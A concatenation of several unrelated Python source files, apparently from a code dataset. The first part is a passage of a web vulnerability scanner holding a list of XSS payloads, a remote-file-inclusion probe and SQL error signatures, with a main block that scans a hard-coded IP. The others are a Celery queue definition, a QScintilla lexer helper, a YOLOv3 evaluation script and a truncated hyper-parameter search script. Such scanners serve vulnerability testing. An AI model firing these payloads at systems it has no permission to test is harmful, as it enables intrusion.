XSS_PAYLOAD = [
'<script>alert(1);</script>',
'<script>prompt(1);</script>',
'<script>confirm(1);</script>',
'<scr<script>ipt>alert(1)</scr<script>ipt>',
'<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">',
'<svg/onload=prompt(1);>',
'<marquee/onstart=confirm(1)>/',
'<body onload=prompt(1);>',
'<select autofocus onfocus=alert(1)>',
'<textarea autofocus onfocus=alert(1)>',
'<keygen autofocus onfocus=alert(1)>',
'<video><source onerror="javascript:alert(1)">'
]
for test in XSS_PAYLOAD:
r = requests.get(url=self.url + urlencode(test), headers=HEADER)
# if ( 'alert(1)' or 'prompt(1)' or 'confirm(1)' ) in r.text:
if test in r.text:
return 1
return 0
def FileInclude_scan(self):
RFI_PAYLOAD = [
"http://www.baidu.com"
]
url = urllib.parse.urlparse(self.url)
url_query = url.query
url_query_tmp = []
if not url_query:
return 0
for i in url_query.split('&'):
i_tmp = i.replace(i.split('=')[1], RFI_PAYLOAD[0])
url_query_tmp = url_query
url_query_tmp = url_query_tmp.replace(i, i_tmp)
url_tmp = urllib.parse.urlunparse(
urllib.parse.ParseResult(url.scheme, url.netloc, url.path, url.params, url_query_tmp, url.fragment))
r = requests.get(url=url_tmp, headers=HEADER)
if "tieba.baidu.com" in r.text:
return 1
return 0
    def Get_sql_errors(self):
        '''
        Return the compiled table of DBMS error signatures.

        On first call, builds a list of (regex string, dbms constant)
        pairs covering the major database engines, compiles each regex
        case-insensitively, and caches the result in self.sql_errors.
        Subsequent calls return the cached list directly.

        @return: list of (compiled regex, dbms type) tuples.
        '''
        if len(self.sql_errors) != 0:
            return self.sql_errors
        else:
            errors = []
            # ASP / MSSQL
            errors.append(('System\.Data\.OleDb\.OleDbException', dbms.MSSQL))
            errors.append(('\\[SQL Server\\]', dbms.MSSQL))
            errors.append(('\\[Microsoft\\]\\[ODBC SQL Server Driver\\]', dbms.MSSQL))
            errors.append(('\\[SQLServer JDBC Driver\\]', dbms.MSSQL))
            errors.append(('\\[SqlException', dbms.MSSQL))
            errors.append(('System.Data.SqlClient.SqlException', dbms.MSSQL))
            errors.append(('Unclosed quotation mark after the character string', dbms.MSSQL))
            errors.append(("'80040e14'", dbms.MSSQL))
            errors.append(('mssql_query\\(\\)', dbms.MSSQL))
            errors.append(('odbc_exec\\(\\)', dbms.MSSQL))
            errors.append(('Microsoft OLE DB Provider for ODBC Drivers', dbms.MSSQL))
            errors.append(('Microsoft OLE DB Provider for SQL Server', dbms.MSSQL))
            errors.append(('Incorrect syntax near', dbms.MSSQL))
            errors.append(('Sintaxis incorrecta cerca de', dbms.MSSQL))
            errors.append(('Syntax error in string in query expression', dbms.MSSQL))
            errors.append(('ADODB\\.Field \\(0x800A0BCD\\)<br>', dbms.MSSQL))
            errors.append(("Procedure '[^']+' requires parameter '[^']+'", dbms.MSSQL))
            errors.append(("ADODB\\.Recordset'", dbms.MSSQL))
            errors.append(("Unclosed quotation mark before the character string", dbms.MSSQL))
            # DB2
            errors.append(('SQLCODE', dbms.DB2))
            errors.append(('DB2 SQL error:', dbms.DB2))
            errors.append(('SQLSTATE', dbms.DB2))
            errors.append(('\\[IBM\\]\\[CLI Driver\\]\\[DB2/6000\\]', dbms.DB2))
            errors.append(('\\[CLI Driver\\]', dbms.DB2))
            errors.append(('\\[DB2/6000\\]', dbms.DB2))
            # Sybase
            errors.append(("Sybase message:", dbms.SYBASE))
            # Access
            errors.append(('Syntax error in query expression', dbms.ACCESS))
            errors.append(('Data type mismatch in criteria expression.', dbms.ACCESS))
            errors.append(('Microsoft JET Database Engine', dbms.ACCESS))
            errors.append(('\\[Microsoft\\]\\[ODBC Microsoft Access Driver\\]', dbms.ACCESS))
            # ORACLE
            errors.append(('(PLS|ORA)-[0-9][0-9][0-9][0-9]', dbms.ORACLE))
            # POSTGRE
            errors.append(('PostgreSQL query failed:', dbms.POSTGRE))
            errors.append(('supplied argument is not a valid PostgreSQL result', dbms.POSTGRE))
            errors.append(('pg_query\\(\\) \\[:', dbms.POSTGRE))
            errors.append(('pg_exec\\(\\) \\[:', dbms.POSTGRE))
            # MYSQL
            errors.append(('supplied argument is not a valid MySQL', dbms.MYSQL))
            errors.append(('Column count doesn\'t match value count at row', dbms.MYSQL))
            errors.append(('mysql_fetch_array\\(\\)', dbms.MYSQL))
            errors.append(('mysql_', dbms.MYSQL))
            errors.append(('on MySQL result index', dbms.MYSQL))
            errors.append(('You have an error in your SQL syntax;', dbms.MYSQL))
            errors.append(('You have an error in your SQL syntax near', dbms.MYSQL))
            errors.append(('MySQL server version for the right syntax to use', dbms.MYSQL))
            errors.append(('\\[MySQL\\]\\[ODBC', dbms.MYSQL))
            errors.append(("Column count doesn't match", dbms.MYSQL))
            errors.append(("the used select statements have different number of columns", dbms.MYSQL))
            errors.append(("Table '[^']+' doesn't exist", dbms.MYSQL))
            # Informix
            errors.append(('com\\.informix\\.jdbc', dbms.INFORMIX))
            errors.append(('Dynamic Page Generation Error:', dbms.INFORMIX))
            errors.append(('An illegal character has been found in the statement', dbms.INFORMIX))
            errors.append(('<b>Warning</b>: ibase_', dbms.INTERBASE))
            errors.append(('Dynamic SQL Error', dbms.INTERBASE))
            # DML
            errors.append(('\\[DM_QUERY_E_SYNTAX\\]', dbms.DMLDATABASE))
            errors.append(('has occurred in the vicinity of:', dbms.DMLDATABASE))
            errors.append(('A Parser Error \\(syntax error\\)', dbms.DMLDATABASE))
            # Java
            errors.append(('java\\.sql\\.SQLException', dbms.JAVA))
            errors.append(('Unexpected end of command in statement', dbms.JAVA))
            # Coldfusion
            errors.append(('\\[Macromedia\\]\\[SQLServer JDBC Driver\\]', dbms.MSSQL))
            # Generic errors..
            errors.append(('SELECT .*? FROM .*?', dbms.UNKNOWN))
            errors.append(('UPDATE .*? SET .*?', dbms.UNKNOWN))
            errors.append(('INSERT INTO .*?', dbms.UNKNOWN))
            errors.append(('Unknown column', dbms.UNKNOWN))
            errors.append(('where clause', dbms.UNKNOWN))
            errors.append(('SqlServer', dbms.UNKNOWN))
            # compile them and save that into self.sql_errors.
            for re_string, dbms_type in errors:
                self.sql_errors.append((re.compile(re_string, re.IGNORECASE), dbms_type))
        return self.sql_errors
    def check(self, module, output, waf):
        '''
        Dispatch the scan selected by ``module`` against self.url.

        @param module: one of 'all', 'sql', 'xss', 'rfi'.
        @param output: GUI table widget receiving result rows via
                       output.insert("", "end", values=...) -- presumably
                       a ttk.Treeview; TODO confirm against the caller.
        @param waf: widget passed through to Str_sqlinj_scan so it can
                    pick WAF-bypass payloads.

        Only URLs that actually carry a query string are scanned. SQL
        results are also persisted through the module-level ``mysql``
        store; XSS/RFI hits go to self.logfile and the global vul_file.
        '''
        global vul_file
        url_struct = urllib.parse.urlparse(self.url)
        if url_struct.query != '':
            if module == 'all':
                self.run()
            if module == 'sql':
                # Run the three SQLi detectors; report the first positive
                # (integer-based takes precedence, then string, then error).
                i = self.Integer_sqlinj_scan()
                j = self.Str_sqlinj_scan(waf)
                k = self.Sql_error_scan()
                if i:
                    output.insert("", "end", values=(i, " +1", "yes", "High",self.url[self.url.find("?")+1:self.url.find("=")]))
                    mysql.insert(i+"","+1","yes","High",self.url[self.url.find("?")+1:self.url.find("=")])
                    print(get_ctime() + '\t' + self.url + ":SQL injection!")
                elif j:
                    # Str_sqlinj_scan returns "payload~url"; split it back.
                    output.insert("", "end", values=(j.split("~")[1], j.split("~")[0], "yes", "High",self.url[self.url.find("?")+1:self.url.find("=")]))
                    mysql.insert(j.split("~")[1] , j.split("~")[0], "yes", "High", self.url[self.url.find("?") + 1:self.url.find("=")])
                    print(get_ctime() + '\t' + self.url + ":SQL injection!")
                elif k:
                    output.insert("", "end", values=(k, "\'", "yes", "High",self.url[self.url.find("?")+1:self.url.find("=")]))
                    mysql.insert(k+"","\'", "yes", "High",self.url[self.url.find("?") + 1:self.url.find("=")])
                    print(get_ctime() + '\t' + self.url + ":SQL injection!")
                else:
                    output.insert("", "end", values=(self.url, "", "no", "",self.url[self.url.find("?")+1:self.url.find("=")]))
                    mysql.insert(self.url, "\'", "no", "", self.url[self.url.find("?") + 1:self.url.find("=")])
                # print get_ctime() + '\t' + self.url + ":SQL injection!"+ self.Str_sqlinj_scan()
                # self.logfile.write(get_ctime() + '\t' + self.url + ":SQL injection!" + '\n')
                # self.logfile.flush()
                # vul_file.write(self.url + '\t' + "SQL injection!" + '\n')
                # vul_file.flush()
            if module == 'xss':
                if self.Xss_scan():
                    print(get_ctime() + '\t' + self.url + ":XSS!")
                    self.logfile.write(get_ctime() + '\t' + self.url + ":XSS!" + '\n')
                    self.logfile.flush()
                    vul_file.write(self.url + '\t' + "XSS!" + '\n')
                    vul_file.flush()
            if module == 'rfi':
                if self.FileInclude_scan():
                    print(get_ctime() + '\t' + self.url + ":RFI!")
                    self.logfile.write(get_ctime() + '\t' + self.url + ":RFI!" + '\n')
                    self.logfile.flush()
                    vul_file.write(self.url + '\t' + "RFI!" + '\n')
                    vul_file.flush()
    def run(self):
        '''
        Run every scanner in sequence and log the first hit.

        Order: integer SQLi, string SQLi, error-based SQLi, XSS, RFI.
        Results go to stdout, self.logfile and the module-level vul_file.
        '''
        print("[+] %s\t%s" % (get_ctime(), self.url))
        if self.Integer_sqlinj_scan():
            print("    Integer SQL injection!")
            self.logfile.write(get_ctime() + '\t' + self.url + ":Integer SQL injection!" + '\n')
            self.logfile.flush()
            vul_file.write(self.url + '\t' + "Integer SQL injection!" + '\n')
            vul_file.flush()
        # NOTE(review): check() passes a waf argument to Str_sqlinj_scan;
        # verify the parameter is optional, otherwise this call raises.
        elif self.Str_sqlinj_scan():
            print("    String SQL injection!")
            self.logfile.write(get_ctime() + '\t' + self.url + ":String SQL injection!" + '\n')
            self.logfile.flush()
            vul_file.write(self.url + '\t' + "String SQL injection!" + '\n')
            vul_file.flush()
        elif self.Sql_error_scan():
            print("    SQL error injection!")
            self.logfile.write(get_ctime() + '\t' + self.url + ":SQL error injection!" + '\n')
            self.logfile.flush()
            vul_file.write(self.url + '\t' + "SQL error injection!" + '\n')
            vul_file.flush()
        elif self.Xss_scan():
            print("    XSS vulnerabe!")
            self.logfile.write(get_ctime() + '\t' + self.url + ":XSS vulnerabe!" + '\n')
            self.logfile.flush()
            vul_file.write(self.url + '\t' + "XSS vulnerabe!" + '\n')
            vul_file.flush()
        elif self.FileInclude_scan():
            print("    RFI vulnerabe!")
            self.logfile.write(get_ctime() + '\t' + self.url + ":RFI vulnerabe!" + '\n')
            self.logfile.flush()
            vul_file.write(self.url + '\t' + "RFI vulnerabe!" + '\n')
            vul_file.flush()
        else:
            print("    safe")
            self.logfile.write(get_ctime() + '\t' + self.url + ":safe" + '\n')
            self.logfile.flush()
# Standalone smoke test: scan a single hard-coded URL. The commented-out
# block below keeps a batch of lab URLs used during development.
# NOTE(review): vul_module appears to be a Thread-like class (start());
# confirm against its definition earlier in this file.
if __name__ == '__main__':
    logfile = open('logfile.txt', 'a')
    url = "http://192.168.127.12:8098/stkj/index.php/product/safety_wire?t=7"
    self = vul_module(url, logfile)
    self.start()
    '''
    url = "http://1172.16.17.32/sqli/example1.php?name=root"
    self = vul_module(url,logfile)
    self.start()
    url = "http://192.168.8.131/sqli/example2.php?name=root"
    self = vul_module(url,logfile)
    self.start()
    url = "http://192.168.8.131/sqli/example3.php?name=root"
    self = vul_module(url,logfile)
    self.start()
    url = "http://19172.16.17.32/sqli/example4.php?id=2"
    self = vul_module(url,logfile)
    self.start()
    url = "http://192.168.8.131/sqli/example5.php?id=2"
    self = vul_module(url,logfile)
    self.start()
    url = "http://192.168.8.131/sqli/example6.php?id=2"
    self = vul_module(url,logfile)
    self.start()
    url = "http://192.168.8.131/sqli/example7.php?id=2"
    self = vul_module(url,logfile)
    self.start()
    url = "http://192.168.8.131/sqli/example8.php?order=name"
    self = vul_module(url,logfile)
    self.start()
    url = "http://192.168.8.131/sqli/example9.php?order=name"
    self = vul_module(url,logfile)
    self.start()
    '''
| 2.65625 | 3 |
mayan/apps/common/queues.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 2 | 12769725 | from django.utils.translation import ugettext_lazy as _
from mayan.apps.task_manager.classes import CeleryQueue
from mayan.apps.task_manager.workers import worker_d
# Celery queue for the "Tools" app's background tasks, serviced by worker D.
queue_tools = CeleryQueue(label=_('Tools'), name='tools', worker=worker_d)
| 1.554688 | 2 |
eye/lexers.py | hydrargyrum/eye | 12 | 12769726 | # this project is licensed under the WTFPLv2, see COPYING.txt for details
"""Helpers for lexer use
In EYE, builtin lexers from QScintilla are used. See :any:`PyQt5.Qsci.QsciLexer`.
"""
import mimetypes
from PyQt5.QtGui import QColor, QFont
from PyQt5.Qsci import (
QsciLexerBash, QsciLexerBatch, QsciLexerCPP, QsciLexerCSharp, QsciLexerJava, QsciLexerJavaScript,
QsciLexerCSS, QsciLexerD, QsciLexerFortran, QsciLexerHTML, QsciLexerXML, QsciLexerLua,
QsciLexerMakefile, QsciLexerPascal, QsciLexerPerl, QsciLexerPO, QsciLexerPostScript,
QsciLexerPOV, QsciLexerProperties, QsciLexerPython, QsciLexerRuby, QsciLexerSQL, QsciLexerTCL,
QsciLexerTeX, QsciLexerYAML, QsciLexerDiff,
)
__all__ = ('extensionToLexer', 'mimeToLexer', 'applyStyles', 'stylesFromLexer')
def stylesFromLexer(lexer):
	"""Map a QsciLexer's style descriptions to their numeric style ids.

	Iterates every possible style number for `lexer` and records its
	human-readable description, stopping at the first style that has no
	description.

	Returns a dict of ``{description: style_number}``.
	"""
	mapping = {}
	limit = 1 << lexer.styleBitsNeeded()
	for style_number in range(limit):
		description = lexer.description(style_number)
		if not description:
			break
		mapping[description] = style_number
	return mapping
def applyStyles(lexer, spec):
	"""Apply color/paper/font settings to named styles of a lexer.

	:param lexer: the QsciLexer instance to restyle
	:param spec: iterable of ``(style_name, values)`` pairs, where
		``values`` holds up to three entries: foreground color string,
		background (paper) color string, and font family string.
		Unknown style names are silently ignored.
	"""
	styles = stylesFromLexer(lexer)
	for name, values in spec:
		style = styles.get(name, -1)
		if style >= 0:
			# Pass the style id explicitly: QsciLexer.setColor/setPaper/
			# setFont default to style=-1, which applies the setting to
			# every style instead of just the named one.
			lexer.setColor(QColor(values[0]), style)
			if len(values) > 1:
				lexer.setPaper(QColor(values[1]), style)
			if len(values) > 2:
				lexer.setFont(QFont(values[2]), style)
# Lookup table from (dot-less, case-sensitive) file extension to the
# QsciLexer class that should highlight it. 'Makefile' is matched as a
# literal filename-style key rather than a true extension.
_extensionLexer = {
	'sh': QsciLexerBash,
	'bash': QsciLexerBash,
	'zsh': QsciLexerBash,
	'bat': QsciLexerBatch,
	'cmd': QsciLexerBatch,
	'c': QsciLexerCPP,
	'cc': QsciLexerCPP,
	'cpp': QsciLexerCPP,
	'cxx': QsciLexerCPP,
	'h': QsciLexerCPP,
	'hh': QsciLexerCPP,
	'hpp': QsciLexerCPP,
	'hxx': QsciLexerCPP,
	'cs': QsciLexerCSharp,
	'java': QsciLexerJava,
	'js': QsciLexerJavaScript,
	'json': QsciLexerJavaScript,
	'css': QsciLexerCSS,
	'd': QsciLexerD,
	'patch': QsciLexerDiff,
	'f': QsciLexerFortran,
	'html': QsciLexerHTML,
	'htm': QsciLexerHTML,
	'xml': QsciLexerXML,
	'lua': QsciLexerLua,
	'Makefile': QsciLexerMakefile,
	'pas': QsciLexerPascal,
	'pl': QsciLexerPerl,
	'pm': QsciLexerPerl,
	'po': QsciLexerPO,
	'pot': QsciLexerPO,
	'ps': QsciLexerPostScript,
	'pov': QsciLexerPOV,
	'inc': QsciLexerPOV,
	'properties': QsciLexerProperties,
	'ini': QsciLexerProperties,
	'py': QsciLexerPython,
	'rb': QsciLexerRuby,
	'sql': QsciLexerSQL,
	'tcl': QsciLexerTCL,
	'tex': QsciLexerTeX,
	'yaml': QsciLexerYAML,
	'yml': QsciLexerYAML,
}
def extensionToLexer(ext):
	"""Return the QsciLexer class associated with a file extension.

	`ext` may be given with or without a leading dot. `None` is returned
	when no lexer is registered for the extension.
	"""
	key = ext
	if key and key.startswith('.'):
		key = key[1:]
	return _extensionLexer.get(key)
def mimeToLexer(mime):
	"""Return the QsciLexer class for a mimetype.

	The mimetype is first mapped to a file extension, then resolved via
	:any:`extensionToLexer`. `None` is returned when no lexer matches.
	"""
	guessed_ext = mimetypes.guess_extension(mime)
	return extensionToLexer(guessed_ext)
| 1.875 | 2 |
applications/tensorflow/detection/yolov3/evaluate.py | payoto/graphcore_examples | 260 | 12769727 | #! /usr/bin/env python
# coding=utf-8
# Copyright (c) 2021 Graphcore Ltd. All Rights Reserved.
# Copyright (c) 2019 YunYang1994 <<EMAIL>>
# License: MIT (https://opensource.org/licenses/MIT)
# This file has been modified by Graphcore Ltd.
import argparse
import json
import math
import os
import shutil
import time
import numpy as np
import core.utils as utils
import cv2
import log
import tensorflow as tf
from core.dataset import Dataset
from core.yolov3 import YOLOV3
from ipu_utils import stages_constructor
from log import logger
from tensorflow.python import ipu
from tensorflow.python.ipu import ipu_infeed_queue, ipu_outfeed_queue, loops
class YoloTest(object):
    """Evaluate a trained YOLOv3 model on a Graphcore IPU.

    Builds the detection graph (optionally fed through an IPU infeed
    queue for throughput), restores trained weights, and writes
    ground-truth and predicted bounding boxes to text files so mAP can
    be computed offline.
    """
    def __init__(self, opts):
        # Pull evaluation settings from the nested JSON options dict.
        self.input_size = opts["test"]["input_size"]
        self.classes = utils.read_class_names(opts["yolo"]["classes"])
        self.num_classes = len(self.classes)
        self.score_threshold = opts["test"]["score_threshold"]
        self.iou_threshold = opts["test"]["iou_threshold"]
        self.moving_avg_decay = opts["yolo"]["moving_avg_decay"]
        self.annotation_path = opts["test"]["annot_path"]
        self.weight_file = opts["test"]["weight_file"]
        self.write_image = opts["test"]["write_image"]
        self.write_image_path = opts["test"]["write_image_path"]
        self.show_label = opts["test"]["show_label"]
        self.batch_size = opts["test"]["batch_size"]
        self.precision = tf.float16 if opts["yolo"]["precision"] == "fp16" else tf.float32
        self.use_moving_avg = opts["yolo"]["use_moving_avg"]
        self.repeat_count = opts["test"]["repeat_count"]
        self.use_infeed_queue = opts["test"]["use_infeed_queue"]
        self.predicted_file_path = opts["test"]["predicted_file_path"]
        self.ground_truth_file_path = opts["test"]["ground_truth_file_path"]
        # meta_dict carries per-image metadata (size, name, annotation
        # line) keyed by image index, since it can't go through the graph.
        self.meta_dict = {}
        self.testset = Dataset("test", opts)
        # Configure arguments for targeting the IPU
        config = ipu.config.IPUConfig()
        config.auto_select_ipus = 1
        config.configure_ipu_system()
        model = YOLOV3(False, opts)
        # construct model
        # we will put whole network on one ipu
        layers = []
        # build layer functions for backbone and upsample
        layers.extend(model.build_backbone())
        # last layer of darknet53 is classification layer, so it have 52 conv layers
        assert len(layers) == 52
        layers.extend(model.build_upsample())
        # there is 25 conv layers if we count upsmaple as a conv layer
        assert len(layers) == 52+25
        # decoding layer and loss layer is always put on last IPU
        layers.append(model.decode_boxes)
        # reuse stages_constructor so we don't need to pass params by hand
        network_func = stages_constructor(
            [layers],
            ["input_data", "nums"],
            ["pred_sbbox", "pred_mbbox", "pred_lbbox", "nums"])[0]
        input_shape = (self.batch_size, self.input_size, self.input_size, 3)
        self.lines, self.image_dict = self.load_data()
        if self.use_infeed_queue:
            # The dataset for feeding the graphs
            def data_gen():
                return self.data_generator()
            with tf.device("cpu"):
                ds = tf.data.Dataset.from_generator(data_gen,
                                                    output_types=(tf.float16, tf.int32),
                                                    output_shapes=(input_shape, (self.batch_size,))
                                                    )
                ds = ds.repeat()
                ds = ds.prefetch(self.repeat_count*10)
            # The host side queues
            infeed_queue = ipu_infeed_queue.IPUInfeedQueue(ds)
            outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue()
            def model_func(input_data, nums):
                pred_sbbox, pred_mbbox, pred_lbbox, nums = network_func(input_data, nums)
                outfeed = outfeed_queue.enqueue(
                    {"pred_sbbox": pred_sbbox, "pred_mbbox": pred_mbbox, "pred_lbbox": pred_lbbox, "nums": nums})
                return outfeed
            def my_net():
                r = loops.repeat(self.repeat_count,
                                 model_func, [], infeed_queue)
                return r
            with ipu.scopes.ipu_scope("/device:IPU:0"):
                self.run_loop = ipu.ipu_compiler.compile(
                    my_net, inputs=[])
            # The outfeed dequeue has to happen after the outfeed enqueue
            self.dequeue_outfeed = outfeed_queue.dequeue()
            self.sess = tf.Session(config=tf.ConfigProto())
            self.sess.run(infeed_queue.initializer)
        else:
            # if using feed dict, it will be simpler
            # the cost is throughput
            with tf.device("cpu"):
                with tf.name_scope("input"):
                    # three channel images
                    self.input_data = tf.placeholder(
                        shape=input_shape, dtype=self.precision, name="input_data")
                    self.nums = tf.placeholder(
                        shape=(self.batch_size), dtype=tf.int32, name="nums")
            with ipu.scopes.ipu_scope("/device:IPU:0"):
                self.output = ipu.ipu_compiler.compile(
                    network_func, [self.input_data, self.nums])
            self.sess = tf.Session(
                config=tf.ConfigProto())
        # Restore either the EMA shadow variables or the raw weights,
        # depending on whether training used a moving average.
        if self.use_moving_avg:
            with tf.name_scope("ema"):
                ema_obj = tf.train.ExponentialMovingAverage(
                    self.moving_avg_decay)
            self.saver = tf.train.Saver(ema_obj.variables_to_restore())
        else:
            self.saver = tf.train.Saver()
        self.saver.restore(self.sess, self.weight_file)
    def load_data(self):
        """Read all annotation lines and pre-load the test images.

        Returns (lines, image_dict) where image_dict maps each stripped
        annotation line to its loaded image.
        """
        with open(self.annotation_path, "r") as annotation_file:
            # load_all images
            lines = []
            for line in annotation_file:
                lines.append(line)
        image_dict = self.testset.load_images(dump=False)
        return lines, image_dict
    def data_generator(self):
        """Generate input image and write groundtruth info
        """
        if os.path.exists(self.write_image_path):
            shutil.rmtree(self.write_image_path)
        os.mkdir(self.write_image_path)
        self.ground_truth_file = open(self.ground_truth_file_path, "w")
        image_datas = []
        nums = []
        for num, line in enumerate(self.lines):
            annotation = line.strip().split()
            image_path = annotation[0]
            image_name = image_path.split("/")[-1]
            image = self.image_dict[line.strip()]
            bbox_data_gt = np.array(
                [list(map(int, box.split(","))) for box in annotation[1:]])
            if len(bbox_data_gt) == 0:
                bboxes_gt = []
                classes_gt = []
            else:
                bboxes_gt, classes_gt = bbox_data_gt[:,
                                                     :4], bbox_data_gt[:, 4]
            num_bbox_gt = len(bboxes_gt)
            # output ground-truth
            self.ground_truth_file.write(str(num)+":\n")
            for i in range(num_bbox_gt):
                class_name = self.classes[classes_gt[i]]
                xmin, ymin, xmax, ymax = list(map(str, bboxes_gt[i]))
                bbox_mess = ",".join(
                    [class_name, xmin, ymin, xmax, ymax]) + "\n"
                self.ground_truth_file.write(bbox_mess)
            image_copy = np.copy(image)
            org_h, org_w, _ = image.shape
            image_data = utils.resize_image(
                image_copy, [self.input_size, self.input_size])
            # we don't want to pass metadata through pipeline
            # so we'll keep it with a dictionary
            self.meta_dict[num] = [org_h, org_w, image_name, line]
            image_datas.append(image_data)
            nums.append(num)
            if len(nums) < self.batch_size:
                if num < len(self.lines) - 1:
                    continue
                else:
                    # if there's not enough data to fill the last batch
                    # we repeat the last image to yield a full sized batch
                    for _ in range(len(image_datas), self.batch_size):
                        image_datas.append(image_datas[-1])
                        nums.append(nums[-1])
            image_datas = np.array(image_datas).astype(np.float16)
            yield (image_datas, nums)
            if num < len(self.lines) - 1:
                image_datas = []
                nums = []
        while True:
            # if using infeed_queue. it will need more batches
            # to padd the data and meet the required repeat_count
            # so we will use last batch for padding
            yield (image_datas, nums)
    def parse_result(self, pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums):
        """Parse and write predicted result
        """
        for i in range(len(nums)):
            # if nums value is repeated
            # that means nums[i] is a repeated value for matching required batch size
            # so we can stop the iteration
            if i > 0 and nums[i] <= nums[i-1]:
                break
            num = nums[i]
            pred_sbbox = pred_sbbox_list[i]
            pred_mbbox = pred_mbbox_list[i]
            pred_lbbox = pred_lbbox_list[i]
            org_h, org_w, image_name, line = self.meta_dict[num]
            image_path = line.strip().split()[0]
            image = self.image_dict[line.strip()]
            pred_bbox = np.concatenate([np.reshape(pred_sbbox, (-1, 5 + self.num_classes)),
                                        np.reshape(
                                            pred_mbbox, (-1, 5 + self.num_classes)),
                                        np.reshape(pred_lbbox, (-1, 5 + self.num_classes))], axis=0)
            # convert boxes from input_image coordinate to original image coordinate
            bboxes = utils.postprocess_boxes(
                pred_bbox, (org_h, org_w), self.input_size, self.score_threshold)
            bboxes_pr = utils.nms(bboxes, self.iou_threshold)
            if self.write_image:
                image = utils.draw_bbox(
                    image, bboxes_pr, self.classes, show_label=self.show_label)
                cv2.imwrite(self.write_image_path+image_name, image)
            self.predict_result_file.write(str(num)+":\n")
            for bbox in bboxes_pr:
                coor = np.array(bbox[:4], dtype=np.int32)
                score = bbox[4]
                class_ind = int(bbox[5])
                class_name = self.classes[class_ind]
                score = "%.4f" % score
                xmin, ymin, xmax, ymax = list(map(str, coor))
                bbox_mess = ",".join(
                    [class_name, score, xmin, ymin, xmax, ymax]) + "\n"
                self.predict_result_file.write(bbox_mess)
    def evaluate(self):
        """Run inference over the whole test set, writing predictions and
        logging per-iteration latency/throughput, then close all files.
        """
        self.predict_result_file = open(self.predicted_file_path, "w")
        if self.use_infeed_queue:
            # using infeed queue to improve throughput
            # we can use an additional thread to run dequeue_outfeed for decrease latency and further improve throughput
            total_samples = len(self.lines)
            interaction_samples = self.batch_size*self.repeat_count
            total_interactions = total_samples/interaction_samples
            total_interactions = math.ceil(total_interactions)
            for interaction_index in range(total_interactions):
                run_start = time.time()
                self.sess.run(self.run_loop)
                result = self.sess.run(
                    self.dequeue_outfeed)
                run_duration = time.time()-run_start
                pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums = result[
                    "pred_sbbox"], result["pred_mbbox"], result["pred_lbbox"], result["nums"]
                for i in range(len(nums)):
                    # len(nums) == repeat_count
                    # there's repeat count number of batches for each run
                    if i > 0 and nums[i][0] <= nums[i-1][0]:
                        # ignore repeated data
                        # these are only for meeting data size required when using ipu.loops.repeat
                        break
                    self.parse_result(pred_sbbox_list[i], pred_mbbox_list[i], pred_lbbox_list[i], nums[i])
                logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}, repeat count: {}".format(
                    (interaction_index+1)*interaction_samples, len(self.lines),
                    run_duration,
                    interaction_samples/run_duration,
                    self.batch_size,
                    self.repeat_count))
        else:
            # if not use infeed_queue, it will return for every batch
            data_gen = self.data_generator()
            interaction_samples = self.batch_size
            total_interactions = math.ceil(len(self.lines)/interaction_samples)
            for interaction_index in range(total_interactions):
                image_datas, nums = next(data_gen)
                run_start = time.time()
                pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums = self.sess.run(
                    self.output,
                    feed_dict={
                        self.input_data: image_datas,
                        self.nums: nums
                    }
                )
                run_duration = time.time()-run_start
                self.parse_result(pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums)
                logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}".format(
                    (interaction_index+1)*interaction_samples,
                    len(self.lines),
                    run_duration,
                    interaction_samples/run_duration,
                    self.batch_size))
        self.ground_truth_file.close()
        self.predict_result_file.close()
        self.sess.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="evaluation in TensorFlow", add_help=False)
parser.add_argument("--config", type=str, default="config/config_800.json",
help="json config file for yolov3.")
parser.add_argument("--test_path", type=str, default="./data/dataset/voc_test.txt",
help="data path for test")
arguments = parser.parse_args()
with open(arguments.config) as f:
opts = json.load(f)
opts['test']['annot_path'] = arguments.test_path
YoloTest(opts).evaluate()
| 1.851563 | 2 |
scripts/train.py | MathieuTuli/autoHyper | 9 | 12769728 | """
MIT License
Copyright (c) 2020
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from pathlib import Path
from typing import Dict
from autohyper import optimize, LowRankMetrics, HyperParameters
from torchvision import datasets, transforms
from torch.optim import Adam
from gutils import init_logger
import torchvision.models as models
import numpy as np
import torch
def main():
    """Optimize ResNet-18 hyper-parameters with autoHyper, then retrain.

    Builds a CIFAR-10 loader, defines an ``epoch_trainer`` closure that
    autoHyper calls with candidate hyper-parameter values, searches over
    learning rate and weight decay, and finally trains for 250 epochs
    with the selected values.
    """
    dataset = torch.utils.data.DataLoader(
        datasets.CIFAR10('.', download=True, transform=transforms.ToTensor()),
        batch_size=128)
    def epoch_trainer(hyper_parameters: Dict[str, float],
                      epochs) -> LowRankMetrics:
        # Fresh model/optimizer for each candidate configuration, using
        # the values supplied in @argument: hyper_parameters.
        print('Run epochs:', hyper_parameters)
        model = models.resnet18()
        model.train()
        model = model.cuda()
        metrics = LowRankMetrics(list(model.parameters()))
        optimizer = Adam(model.parameters(),
                         lr=hyper_parameters['lr'],
                         weight_decay=hyper_parameters['weight_decay'],)
